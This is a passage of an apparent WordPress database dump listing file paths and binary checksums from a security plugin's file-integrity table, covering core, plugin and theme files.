V�ɨ�z0q��','',0,'?'),('ϚWqu_�8�~\r���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/Utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��K0R��%��0`�l','�u��tk���|48k��M�*���z9Z���I�','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p���[��km�@!a��','CLټD	_���\Z�*�Oo+%x?�}i��+e�%��j','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��{��#��\\k�','P%|���J���q]09��1=��bH�c*��Z:@','',0,'?'),('�vx1�OJ(FF!hOP','wp-content/plugins/wp-smushit/app/pages/class-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w9A��1��sY��','kO��;��|�r[*���\'�L��_uH��K`��','',0,'?'),('�t3�.��^\0���','wp-content/plugins/wordpress-seo/images/alert-error-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dyѵJ6�hh2=Yظx','�S6]+��u^L1n���<�7���/M�z��`�f','',0,'?'),('\0�,�#�heLG�(}','wp-includes/blocks/query-pagination-numbers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!�g�\0�jDi�\Z','�~�x�X���%\"�>�\"ݡ����[','',0,'?'),('G��1��i�t�n� �','wp-content/plugins/wordpress-seo/src/conditionals/migrations-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TG_��S��<&�^�','�܁�:¾����9$�7##���B��<�V','',0,'?'),('�M�g�-YiN���','wp-includes/wp-includes/js/wp-api.min.js',0,'�(�ϩx.�@���� ','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('li����8���!�','wp-content/plugins/wp-cerber/assets/flags/es.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Nw�-�Z��)-Y��','N�1obͥ\rț.P�t��A�+H�Y�B(/\"','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH�	\n��g��','',0,'?'),('3���X�G%<!>','wp-includes/blocks/pullquote/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�ڽ��u�g{�\Z','�SF�=���T�	��n	�M晷O&�Xpڔ','',0,'?'),('9*I���Cc����','wp-includes/blocks/post-excerpt/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӣ�����6��','L(�Ƅ�}�\03��t9v~<�{��~���y1','',0,'?'),('q���_\"�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�仺ᧇ���~c�','$�\'@�οo�eА~S�1pt�y>Ի#&��V�','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('yvtT�P5-+`1��','wp-content/themes/twentytwentythree/templates/404.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��\"�ښ\'�&��..','�b�y&��>��#ᎀR����\Z�]j_','',0,'?'),('�)���E��)�K�;','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/PostAuthOptionProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0w\Z�\"�TVej�l','W#�}�Z�~4��NU�������W�2����3','',0,'?'),('���\0��[�uS��G�','wp-content/plugins/wordpress-seo/admin/views/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Ѯ}.��\"e��7�i','�qd�9�����$�*�e��[�~�Q�um��!UF','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7	��y�񮌬��U{����ԟ��`��]m��','',0,'?'),('���[\02�ށʹ','wp-content/plugins/wp-cerber/assets/flags/ps.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o\\�7@�G�A�p','����<E�Fp�ό��Ʋ�.�>��y��','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i~�U:�Y0��?�','[�nc6d�X�w��R�D��uR�','',0,'?'),('�&0�%���K��.�','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��fԂۀ�:��','�aĭ�Q���jΞ��{b�!1�I��}\nK�','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('��O�X���\0�7��','wp-content/plugins/wordpress-seo/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c\0�ԡa�\0B��','�^�����ڈ�8ɢ��\r�5�U��E�','',0,'?'),('	e�حV�M��y�','wp-includes/blocks/rss/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�}�H\rU��kL�ӝ�','}�iNk�uq�\0/&rTY��)�O�7�MD�E�d�ܿ','',0,'?'),('�7@%��\r\ZI��T','wp-includes/wp-includes/class-wp-oembed.php',0,'��)�Q�\\�2%����','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�L���B��+�?�','�X����H�X��DWI�`�Q]Ǩ\"!�S�','',0,'?'),('\"�F{�L��M��#�L','wp-includes/wp-includes/images/smilies/icon_mrgreen.gif',0,'�$_��u�X|I%~$','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\'��N�8�_�\n�\"��h','wp-includes/blocks/comments-pagination-next.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�S�2��w�a','�:T؍d�(�B�JU��Y��g*���u�=�','',0,'?'),('(�J��qH���','wp-content/plugins/wp-cerber/assets/flags/pw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����)���|	�t�\\�','P�7\0|��^�B%H���S�ɳGGD]�%�hu��:','',0,'?'),('(xB{D$a��3#��A','wp-content/plugins/wp-cerber/assets/flags/tv.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ���$�Vʲ��_','g��	;,>�r^��L*�,�t||�-����q','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��b�ތ1�zP�D.','�G`��%D��S�&���\0�v�p�ב��V��.','',0,'?'),('.�8� �\n\\�d��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/PromisorInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�Gs�=�[ h��','�Tc/Կ��ЍN��	t��O�u��bNy','',0,'?'),('0@�,���i�n��B�','wp-includes/wp-includes/css/wp-pointer-rtl.css',0,'b;���f�J-�','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('7�c-���kЄ\"�`k','wp-includes/blocks/html/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zm���Ƿ!KF���','\n^/3�<S��wD�-�?q�R&�\"��s91oR}','',0,'?'),('8-���j/�XQ\\!�','wp-content/plugins/wordpress-seo/src/builders/indexable-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̢*ʒ�-3�Y^f|�','P�<g�z٣\"�9w��䘅2����,�W�\n','',0,'?'),('8B�^�_�H�yn�}','wp-includes/wp-includes/update.php',0,'*�瑥���\n��bk\0�q','*�瑥���\n��bk\0�q','��\n	�U����y���A��80CĆ���6$3','',0,'?'),('>�T<&ʷWS��U�i','wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QU�/2e�T����','&���B%��C�v�S����U\\c|�\\6.�','',0,'?'),('?��%i�V3�ǵ\'�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bg.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UZ�V/�dn���I_�','=�Ft����oY�]�V������HgF?�C��','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�&�9��U�s�A','�?{�� A>��DB���X\"(7i��h(��xt','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2O�_�y�#��W�Z�','�a�Ç�z�K����7dn�Ŷfp&�X�r','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�\"�ufXf�ۏ�M','E���k%>�5@|8��S�	���&�s��^ϡ','',0,'?'),('q<��/�OA8�r���','wp-content/themes/hitmag/inc/kirki/core/class-kirki-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&q\n�m�i�U�&\Z�','�\rr��t��3����c~8�>�9y�B(q','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�8�7����<��Ik','x�#t標&�p�Y:�A3x��\n��\\{�ΐB	�','',0,'?'),('�< =�q���K�iU','wp-content/plugins/redirection/locale/redirection.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P���xaՉ��8���','��nY6���I��5׼�&\r�\r5Ξ��)S�ab','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('�~�zk\'�r;�l��','wp-content/plugins/wordpress-seo/lib/migrations/adapter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�dT$;�F4?p1��','��W�p�S�z�H7�9&E�(fG��y��Ѣx�','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K`�e^�hd[_H�Ƥ','�\r-����m�M0i��\r�xގ�#U�=�{�','',0,'?'),('�qB_ʿ{w�P\"�\\!','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq-questions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`E�2WP�i�','�V	deD����2G�i�#fH������','',0,'?'),('�o���?��8|�}','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>,�r�&.E��<L','?�;aA��:����3�XqCZCH��N9��l�u','',0,'?'),('�L�f��q�\'����','wp-content/plugins/wp-smushit/core/modules/async/class-abstract-async.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڛλ�\n��/v��D.','�1S�m�Q�&Y���Z���4X�OWJ��3�J','',0,'?'),('�\\�K&��]�\'\r','wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ki�6����	c7�:','�<���A����}{|qj�\n�fq\04}��[�|\\cl','',0,'?'),('�Ս�G�h����_^','wp-includes/wp-includes/js/jquery/ui/effect-size.js',0,'a;l�@��r%�ݢZ','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('��\0F[bލ\Zp�j$','wp-content/plugins/all-in-one-wp-security-and-firewall/images/notices/black_friday.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�W4�pH�\0�V����','�X���C�Y}�6e�T�3���\"\'*+~�/D','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\r<�:ފ`ӈ�r\"�J','|�o���C��/y�w2jzIӭ�J1IJ�S','',0,'?'),('�kǦ<��Q�}���','wp-content/plugins/wp-smushit/app/common/all-images-smushed-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�aN=gSB�{E��f���','\nw��1oa#?�V򵒤�>�L�m���e7','',0,'?'),('\rZ��� ��p5of','wp-includes/wp-includes/js/jquery/ui/effect-drop.js',0,'���閴�u)�B���1�','���閴�u)�B���1�','��v��h��d���L�V�y􅊖�^n\"�ّ\0]p�','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('0i,M8��_�� �','wp-content/themes/hitmag/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�N�ѝM<x!s�}��]','\'��/ӎvS5�:L���`�\\�6�F����G�','',0,'?'),('Fq���X��۠;��','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq-question-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1��{�2yE�O-�','���?�qh)����*�v�\"8d�`����\ns*','',0,'?'),('Z�1��4�ʃ�e�*','wp-content/plugins/wp-cerber/assets/flags/ga.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}\Z�l�%�{bT��','��-�fCq����9���Z�z�u\n����]�','',0,'?'),('g�W�P�+>�����','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/hu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��tt��\Z�<\0��',',�@�\"wS�]l�:Ѥ��$����;�>���','',0,'?'),('o���	l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F�Ȍ�','',0,'?'),('u�\r:��?��!�\Z�','wp-content/plugins/wordpress-seo/src/config/migrations/20200609154515_AddHasAncestorsColumn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��z��t�#2��','!)a!�n��X�&�mB2�;����!j','',0,'?'),('��A������]ט','wp-content/plugins/wordpress-seo/admin/admin-settings-changed-listener.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����5�Mx�:�xpJ','��vG��jX�Yxt9I;���-p�}�y�','',0,'?'),('�Lýf���8=�f�B{','wp-content/plugins/wordpress-seo/inc/class-upgrade-history.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:Pg�ZN��}�K��','z�Q��r�s�Y�Vj���W���Cy�#S�:�h','',0,'?'),('�x��|s����K�a�','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��YJ��Jk���','��\Z=�DBא��	%%A?O�w��*/�~u','',0,'?'),('��f��� �<@���','wp-includes/wp-includes/css/dist/edit-post/style-rtl.css',0,'�����vQD��WO��','�����vQD��WO��','���dN�m.��E;\'�\0��O�3�RPB','',0,'?'),('���#����	>�7','wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),('ăf����HH���','wp-includes/blocks/navigation/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z![�{��0b\'3�','�J\Z��teW&\n\0��\\.z�n9�xLfl�x7�Nk','',0,'?'),('ņL�G��P(�Ή�ȯ','wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��׋@�/�a��','�W�I��`6�3�X�Ab�#;r��v���{Mp6','',0,'?'),('�@Da��o�e�ߚ�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/updraft-notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\\���&#b��','Uup ����M���A�s7�kc���4\"3z','',0,'?'),('�&�	A�H��)�I&��','wp-includes/js/dist/vendor/moment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nZ�x>���)#�2k2','R��dv�ϒ��eLk}q�E%��V���ѻ�W','',0,'?'),('�W�#D��?H-Z\'h�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rG�������8Ѝr��','�[쮝����>�#���}�8�E�A%�]�,','',0,'?'),('�cY�F���}�j`��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����b(浏К','n;�<��	Ǖ�-W�t��]��<�s���u�','',0,'?'),('&��2������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ylh��w�%Re���','���\njq�W��	�v_�#�� f��~��R�>','',0,'?'),('#�7��r�Y�\0��i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��fZ�؍PIR&i��','�EQtY�=�j.#eW㈤A3QcP��T�','',0,'?'),('&#�p�J��h��','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&|�ɦ���{��','�7�\r��O!6���k�-ڥ�v,�f;oJ[��','',0,'?'),('&�����c�;��)�','wp-content/plugins/wp-cerber/assets/flags/ni.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KM�.\nt�<\'���\'T','�k��	h���sR$Q�Q�\\\Z��q�','',0,'?'),(',!#Q��P�[;����','wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����&~�.���@Y$','b�Y�u\"]���F��Oi�<�^&�!l*�~\0f�5','',0,'?'),('4��ہ��;�0�.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(G\"n�rPi�)߬�j','\r�FA�me�a	r��-�w�Y�E�u�����u','',0,'?'),('8(�K�L._\'%���','wp-content/plugins/wordpress-seo/js/dist/languages/en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-b5{�΁oά;8�','���h;�t�W�-K�u��f���`m�-�o��','',0,'?'),(':뭲c��RPe(','wp-includes/rest-api/class-wp-rest-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��x�Ȓ�T��','�!���X*V\0�H�KL��R]�һ�[��}T}Q�','',0,'?'),('A����dǁ�i�߿','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/MaskPatternTester.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-+��y�c<铷O�','ܩ�Rfd��q��Xpl#��WN�!Kŧ\nkh','',0,'?'),('K��xP0&���O:p','wp-includes/blocks/archives/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rv}��\')4~~�','Ƹ�C�YM����a.L���8�yQ�v�q�I�','',0,'?'),('T?�,%,�zG%���','wp-content/plugins/wp-cerber/assets/select2/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABQ,�:	��\r�j','����Z5L�ѾR��9���	`C���)�M','',0,'?'),('e؟�v���笪�Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �UwYI��I�}�','���ݠ\r��ڗU�D�PT���V+6��^:2!���','',0,'?'),('g�<������Y��','wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/third-party/elementor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kH3�ϛӒ);�','u��m�Ys�3M��3�l���:��HHi','',0,'?'),('k\0\Z���{ ݛ6�','wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W/���\\���nE7','��H@W͇�n\'�|Cu1�e�@�J�i|','',0,'?'),('k����b��gS�','wp-includes/js/tinymce/plugins/wplink/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('ye&ߔO)x��p�','wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php',0,')6��):�������',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('{�L�7��3TcNE','wp-content/plugins/wordpress-seo/src/conditionals/addon-installation-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>���\0ȭ�TjF�','nՋ\0�K�U�][�U}�C�B����','',0,'?'),('�j����&(�,}u','wp-includes/wp-includes/js/dist/blob.js',0,'$ج�o8؁)�c����','$ج�o8؁)�c����','��\Z\Z���#9�#�H�;yό�:˙���#e','',0,'?'),('��R$60jw��Im��7','wp-content/plugins/wordpress-seo/admin/import/class-import-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���9<3(�g�','�T�x���-��P�o����A������','',0,'?'),('����57��D�;TkC','wp-includes/blocks/social-links/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J\r8\Z��ȗ��E3e','����]Z���cJ�&;��˲q�r�P%��5�1e4','',0,'?'),('���L��.�\n�w;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E	4m�Y�>�`��','�#�_�[Ѹ��@u�Ha�(+j>V\Z+�q[V','',0,'?'),('�����߶�>D��U','wp-content/plugins/wp-smushit/app/assets/js/smush-tutorials.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[2T�y�fZ����','�!����9c8�3\ns�+B�������G�','',0,'?'),('����g�~�w\Z�hh','wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z��l�q�K��\0','���7犏�됟�,�����0�%�p��','',0,'?'),('�X�N	Z�2f�I','wp-content/plugins/wordpress-seo/js/dist/languages/sv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��⪁�(@��{��u','�\ZQ���w�Ǘi�(��0�g���w�T\0','',0,'?'),('��(q�v�,n�h[�','wp-content/plugins/wp-cerber/assets/flags/li.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Pk<�H�c��g','y�Q�J}��� ���5���gRy���\\4�','',0,'?'),('� \\i����x��(0�','wp-includes/blocks/text-columns/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.%�Q��ʯv�v~\Z,','����}òӳ��lV�_���� g�$q#3	�ǹ��','',0,'?'),('�F�}��1���','wp-content/plugins/wordpress-seo/admin/class-remote-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�HX�67\"��S&','���d]\Z��+N���f�\\Bb�·(�9�Ү%\Z','',0,'?'),('�ͥ`FJ��S�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+U��Ÿ(�5\\','8:��o�I�9,��=zDk8;�{A{�\Zij','',0,'?'),('��.�dFY�Gʹ#M','wp-content/plugins/wordpress-seo/src/loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�*����;��c�T?Q','��1IO����E��\"ѩK�4�P��@���','',0,'?'),('�[�{��RS�����','wp-content/themes/hitmag/inc/kirki/core/class-kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����WW��xr)','Yˬ�F�[��\n��1�n�?����^#�','',0,'?'),('��bm�%����ڭ֫','wp-includes/Requests/Exception/HTTP/502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L+��D��/n�cQr','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),('�~!��y\"?�����','wp-content/plugins/wordpress-seo/src/presenters/webmaster/pinterest-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','蕑��$���I��','��Y�\r�m��v��RP�A��>�oJa^Gq��','',0,'?'),('��|ٻ\';l�͗��','wp-content/themes/twentytwentythree/templates/page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�s���1D	��\0','12��֠���\"]K����9�lψ#�N�:','',0,'?'),('	QW���~-�\0d�','wp-includes/class-phpass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�8����ؾO','�5�{�dp#��d��3�x`�J4�j~p���','',0,'?'),('	?������q�uM','wp-includes/js/mediaelement/mediaelementplayer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),('	?_�N��<Y��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ms.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R.�_K�����+��I','�܉�zu�}���,f�����T��4�<%GT�','',0,'?'),('	Q�K�*���$����','wp-content/plugins/wordfence/css/wf-onboarding.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�)��02w�\nd��','�!vsl\\r��z���-�L��\\PT�����','',0,'?'),('	,��/Օ�!�gy�d','wp-includes/js/media-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��\\�o������q��','G�/(q��\Z�\nP`p��\'-�\'��\"�Y#D','',0,'?'),('	-oؙ��#�/�I','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Rfc7230.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4���s����^I?�','��0��,{A�!+c޵!8�?�(���e','',0,'?'),('	1�\Z]B���u���5�','wp-content/plugins/wordpress-seo/src/routes/importing-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�`�)�H�}����','��g���	�!m���61Y���1:<<��','',0,'?'),('	2�p�<(X�\"�ݵ�','wp-includes/blocks/audio/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b���W���4�5�Zy�','>xj$a�|���R��\\:��0�ɬ��3�O[B','',0,'?'),('	7�������f	`','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�m	�8�f�|�Y��','~�%��ۉ�%���>����Bl�o�u�I)ȉ7g','',0,'?'),('	9��BWGK-�R�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/FnStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�iw��K�2/\Z]','_ƫ�U����h?jl.���3�v�a��\'��b','',0,'?'),('	BE��>�o��0�/X)','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-hummingbird.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�d�Q�z�kJ�Μ','�\"<��<g����C���6z��fN��^;đJp','',0,'?'),('	